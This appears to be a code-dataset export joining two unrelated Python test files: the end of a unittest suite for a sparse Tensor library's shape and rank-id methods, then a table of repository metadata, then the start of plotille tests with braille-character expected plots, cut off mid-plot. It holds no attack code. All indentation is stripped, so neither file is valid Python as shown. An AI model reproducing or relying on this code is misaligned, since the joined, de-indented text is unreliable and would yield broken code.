# 0 1 2 3
#
l2 = [ [ 0, 0, 0, 0 ], # 0
[ 100, 101, 102, 0 ], # 1
[ 0, 201, 0, 0 ], # 2
[ 0, 0, 0, 0 ], # 3
[ 400, 0, 402, 0 ], # 4
[ 0, 0, 0, 0 ], # 5
[ 0, 601, 0, 0 ] ] # 6
t2 = Tensor.fromUncompressed(["M", "K"], l2)
self.assertEqual(t2.getRankIds(), ["M", "K"])
self.assertEqual(t2.getShape(), [7, 4])
def test_shape_fromFiber(self):
"""Test shape of a tensor from a fiber without authoritative shape"""
y1 = Tensor.fromYAMLfile("./data/test_tensor-1.yaml")
f1 = y1.getRoot()
t1 = Tensor.fromFiber(["M", "K"], f1)
with self.subTest(test="All ranks"):
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [7, 4])
with self.subTest(test="All ranks specified"):
self.assertEqual(t1.getShape(["M", "K"]), [7, 4])
with self.subTest(test="Just rank 'M' as list"):
self.assertEqual(t1.getShape(["M"]), [7])
with self.subTest(test="Just rank 'K' as list"):
self.assertEqual(t1.getShape(["K"]), [4])
with self.subTest(test="Just rank 'M'"):
self.assertEqual(t1.getShape("M"), 7)
with self.subTest(test="Just rank 'K'"):
self.assertEqual(t1.getShape("K"), 4)
with self.subTest(test="Check authoritative"):
self.assertIsNone(t1.getShape(authoritative=True))
self.assertIsNone(t1.getShape(["M", "K"], authoritative=True))
self.assertIsNone(t1.getShape(["M"], authoritative=True))
self.assertIsNone(t1.getShape(["K"], authoritative=True))
self.assertIsNone(t1.getShape("M", authoritative=True))
self.assertIsNone(t1.getShape("K", authoritative=True))
def test_shape_fromFiber_authoritative(self):
"""Test shape of a tensor from a fiber with authoritative shape"""
y1 = Tensor.fromYAMLfile("./data/test_tensor-1.yaml")
f1 = y1.getRoot()
t1 = Tensor.fromFiber(["M", "K"], f1, [100,200])
with self.subTest(test="All ranks"):
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [100, 200])
with self.subTest(test="All ranks specified"):
self.assertEqual(t1.getShape(["M", "K"]), [100, 200])
with self.subTest(test="Just rank 'M'"):
self.assertEqual(t1.getShape(["M"]), [100])
with self.subTest(test="Just rank 'K'"):
self.assertEqual(t1.getShape(["K"]), [200])
with self.subTest(test="Just rank 'M'"):
self.assertEqual(t1.getShape("M"), 100)
with self.subTest(test="Just rank 'K'"):
self.assertEqual(t1.getShape("K"), 200)
with self.subTest(test="Check authoritative"):
self.assertEqual(t1.getShape(authoritative=True), [100, 200])
self.assertEqual(t1.getShape(["M", "K"], authoritative=True), [100, 200])
self.assertEqual(t1.getShape(["M"], authoritative=True), [100])
self.assertEqual(t1.getShape(["K"], authoritative=True), [200])
self.assertEqual(t1.getShape("M", authoritative=True), 100)
self.assertEqual(t1.getShape("K", authoritative=True), 200)
def test_rankid_2D(self):
"""Test setting rank ids of 2D tensor"""
# 0 1 2 3
#
l1 = [ [ 0, 0, 0, 0 ], # 0
[ 100, 101, 102, 0 ], # 1
[ 0, 201, 0, 203 ], # 2
[ 0, 0, 0, 0 ], # 3
[ 400, 0, 402, 0 ], # 4
[ 0, 0, 0, 0 ], # 5
[ 0, 601, 0, 603 ] ] # 6
rank_ids = ["M", "K"]
t1 = Tensor.fromUncompressed(rank_ids, l1)
rank_ids2 = t1.getRankIds()
self.assertEqual(rank_ids2, rank_ids)
rank_ids_new = ["M2", "M1"]
t1.setRankIds(rank_ids_new)
rank_ids3 = t1.getRankIds()
self.assertEqual(rank_ids3, rank_ids_new)
if __name__ == '__main__':
unittest.main()
| 34.624088
| 91
| 0.521029
| 1,148
| 9,487
| 4.256969
| 0.090592
| 0.190301
| 0.180888
| 0.230203
| 0.814406
| 0.784326
| 0.767137
| 0.745242
| 0.716186
| 0.684469
| 0
| 0.072688
| 0.312638
| 9,487
| 273
| 92
| 34.750916
| 0.676737
| 0.076947
| 0
| 0.45509
| 0
| 0
| 0.073292
| 0.008657
| 0
| 0
| 0
| 0
| 0.407186
| 1
| 0.05988
| false
| 0
| 0.02994
| 0
| 0.095808
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a1a665dfb175b6e31d5f3ea6b61795b89b98ba6a
| 16,614
|
py
|
Python
|
tests/test_plot.py
|
sswingle/plotille
|
9b00815b129d46613f86befa93f798397ca087c0
|
[
"MIT"
] | 157
|
2017-09-28T12:16:52.000Z
|
2022-03-31T08:13:23.000Z
|
tests/test_plot.py
|
sswingle/plotille
|
9b00815b129d46613f86befa93f798397ca087c0
|
[
"MIT"
] | 43
|
2017-11-01T19:21:21.000Z
|
2022-03-27T08:36:56.000Z
|
tests/test_plot.py
|
sswingle/plotille
|
9b00815b129d46613f86befa93f798397ca087c0
|
[
"MIT"
] | 12
|
2018-01-14T08:05:07.000Z
|
2021-07-31T05:15:38.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from plotille import plot
def test_constant_y():
expected = """ (Y) ^
0.55000000 |
0.54750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50000000 | ⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⠀⠀⠀⠀⠀⠀
0.49750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
-----------|-|---------|---------|---------|---------|---------|---------|---------|---------|-> (X)
| 0.7000000 1.1500000 1.6000000 2.0500000 2.5000000 2.9500000 3.4000000 3.8500000 4.3000000"""
print(plot([1, 4], [0.5, 0.5]))
assert expected == plot([1, 4], [0.5, 0.5])
def test_constant_x():
expected = """ (Y) ^
4.30000000 |
4.21000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
4.12000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
4.03000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.94000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.85000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.76000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.67000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.58000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
